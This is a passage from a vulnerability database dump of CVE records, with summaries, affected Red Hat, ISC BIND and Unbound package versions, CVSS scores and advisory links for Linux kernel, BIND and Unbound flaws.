"https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.62.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.62.1.rt14.347.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-25T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-203", "description": "Observable Discrepancy", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:12:30.514Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1881" }, { "name": "RHSA-2024:1882", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1882" }, { "name": "RHSA-2024:2758", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2758" }, { "name": "RHSA-2024:3414", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3414" }, { "name": "RHSA-2024:3421", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3421" }, { "name": "RHSA-2024:3618", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3618" }, { "name": "RHSA-2024:3627", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3627" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6240" }, { "name": "RHBZ#2250843", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250843" }, { "url": "https://people.redhat.com/~hkario/marvin/" }, { "url": "https://securitypitfalls.wordpress.com/2023/10/16/experiment-with-side-channel-attacks-yourself/" } ], "timeline": [ { "lang": "en", "time": "2023-11-21T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-25T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: marvin vulnerability side-channel leakage in the rsa decryption operation", "x_redhatCweChain": "CWE-203: Observable Discrepancy" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6240", "datePublished": "2024-02-04T14:11:17.824Z", "dateReserved": "2023-11-21T12:10:21.499Z", "dateUpdated": "2024-11-15T15:12:30.514Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6915
Vulnerability from cvelistv5
Published
2024-01-15 09:32
Modified
2024-11-15 15:15
Severity ?
EPSS score ?
Summary
A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6915 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2254982 | issue-tracking, x_refsource_REDHAT | |
https://github.com/torvalds/linux/commit/af73483f4e8b6f5c68c9aa63257bdd929a9c194a |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:42:08.421Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6915" }, { "name": "RHBZ#2254982", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254982" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/af73483f4e8b6f5c68c9aa63257bdd929a9c194a" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank ZhengHan Wang (Hillstone Network) for reporting this issue." } ], "datePublic": "2024-01-15T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:15:36.571Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6915" }, { "name": "RHBZ#2254982", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254982" }, { "url": "https://github.com/torvalds/linux/commit/af73483f4e8b6f5c68c9aa63257bdd929a9c194a" } ], "timeline": [ { "lang": "en", "time": "2023-12-18T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-01-15T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: null pointer dereference vulnerability in ida_free in lib/idr.c", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6915", "datePublished": "2024-01-15T09:32:32.741Z", "dateReserved": "2023-12-18T10:23:45.596Z", "dateUpdated": "2024-11-15T15:15:36.571Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-0841
Vulnerability from cvelistv5
Published
2024-01-28 11:20
Modified
2024-11-15 15:28
Severity ?
EPSS score ?
Summary
A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-0841 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2256490 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::nfv cpe:/a:redhat:enterprise_linux:8::realtime |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:18:18.949Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0841" }, { "name": "RHBZ#2256490", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256490" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2024-01-23T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T15:28:21.604Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-0841" }, { "name": "RHBZ#2256490", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256490" } ], "timeline": [ { "lang": "en", "time": "2024-01-02T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-01-23T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: hugetlbfs: null pointer dereference in hugetlbfs_fill_super function", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-476: NULL Pointer Dereference" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-0841", "datePublished": "2024-01-28T11:20:40.159Z", "dateReserved": "2024-01-23T21:14:44.230Z", "dateUpdated": "2024-11-15T15:28:21.604Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3094
Vulnerability from cvelistv5
Published
2023-01-25 21:34
Modified
2024-08-03 01:00
Severity ?
EPSS score ?
Summary
Sending a flood of dynamic DNS updates may cause `named` to allocate large amounts of memory. This, in turn, may cause `named` to exit due to a lack of free memory. We are not aware of any cases where this has been exploited.
Memory is allocated prior to the checking of access permissions (ACLs) and is retained during the processing of a dynamic update from a client whose access credentials are accepted. Memory allocated to clients that are not permitted to send updates is released immediately upon rejection. The scope of this vulnerability is limited therefore to trusted clients who are permitted to make dynamic zone changes.
If a dynamic update is REFUSED, memory will be released again very quickly. Therefore it is only likely to be possible to degrade or stop `named` by sending a flood of unaccepted dynamic updates comparable in magnitude to a query flood intended to achieve the same detrimental outcome.
BIND 9.11 and earlier branches are also affected, but through exhaustion of internal resources rather than memory constraints. This may reduce performance but should not be a significant problem for most servers. Therefore we don't intend to address this for BIND versions prior to BIND 9.16.
This issue affects BIND 9 versions 9.16.0 through 9.16.36, 9.18.0 through 9.18.10, 9.19.0 through 9.19.8, and 9.16.8-S1 through 9.16.36-S1.
References
▼ | URL | Tags |
---|---|---|
https://kb.isc.org/docs/cve-2022-3094 | vendor-advisory |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:00:10.516Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "CVE-2022-3094", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2022-3094" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "BIND 9", "vendor": "ISC", "versions": [ { "lessThanOrEqual": "9.16.36", "status": "affected", "version": "9.16.0", "versionType": "custom" }, { "lessThanOrEqual": "9.18.10", "status": "affected", "version": "9.18.0", "versionType": "custom" }, { "lessThanOrEqual": "9.19.8", "status": "affected", "version": "9.19.0", "versionType": "custom" }, { "lessThanOrEqual": "9.16.36-S1", "status": "affected", "version": "9.16.8-S1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "ISC would like to thank Rob Schulhof from Infoblox for bringing this vulnerability to our attention." } ], "datePublic": "2023-01-25T00:00:00Z", "descriptions": [ { "lang": "en", "value": "Sending a flood of dynamic DNS updates may cause `named` to allocate large amounts of memory. This, in turn, may cause `named` to exit due to a lack of free memory. We are not aware of any cases where this has been exploited.\n\nMemory is allocated prior to the checking of access permissions (ACLs) and is retained during the processing of a dynamic update from a client whose access credentials are accepted. Memory allocated to clients that are not permitted to send updates is released immediately upon rejection. The scope of this vulnerability is limited therefore to trusted clients who are permitted to make dynamic zone changes.\n\nIf a dynamic update is REFUSED, memory will be released again very quickly. Therefore it is only likely to be possible to degrade or stop `named` by sending a flood of unaccepted dynamic updates comparable in magnitude to a query flood intended to achieve the same detrimental outcome.\n\nBIND 9.11 and earlier branches are also affected, but through exhaustion of internal resources rather than memory constraints. This may reduce performance but should not be a significant problem for most servers. Therefore we don\u0027t intend to address this for BIND versions prior to BIND 9.16.\nThis issue affects BIND 9 versions 9.16.0 through 9.16.36, 9.18.0 through 9.18.10, 9.19.0 through 9.19.8, and 9.16.8-S1 through 9.16.36-S1." } ], "exploits": [ { "lang": "en", "value": "We are not aware of any active exploits." } ], "impacts": [ { "descriptions": [ { "lang": "en", "value": "By flooding the target server with UPDATE requests, the attacker can exhaust all available memory on that server." } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-26T06:03:10.975661Z", "orgId": "404fd4d2-a609-4245-b543-2c944a302a22", "shortName": "isc" }, "references": [ { "name": "CVE-2022-3094", "tags": [ "vendor-advisory" ], "url": "https://kb.isc.org/docs/cve-2022-3094" } ], "solutions": [ { "lang": "en", "value": "Upgrade to the patched release most closely related to your current version of BIND 9: 9.16.37, 9.18.11, 9.19.9, or 9.16.37-S1." } ], "source": { "discovery": "EXTERNAL" }, "title": "An UPDATE message flood may cause named to exhaust all available memory", "workarounds": [ { "lang": "en", "value": "No workarounds known." } ] } }, "cveMetadata": { "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22", "assignerShortName": "isc", "cveId": "CVE-2022-3094", "datePublished": "2023-01-25T21:34:52.983Z", "dateReserved": "2022-09-02T10:25:47.183Z", "dateUpdated": "2024-08-03T01:00:10.516Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1488
Vulnerability from cvelistv5
Published
2024-02-15 05:04
Modified
2024-11-13 14:45
Severity ?
EPSS score ?
Summary
A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1750 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1751 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1780 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1801 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1802 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1804 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2587 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2696 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-1488 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2264183 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 1.16.2 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-1488", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-15T18:02:37.532018Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:22:53.092Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T18:40:21.182Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1750", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1750" }, { "name": "RHSA-2024:1751", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1751" }, { "name": "RHSA-2024:1780", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1780" }, { "name": "RHSA-2024:1801", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" 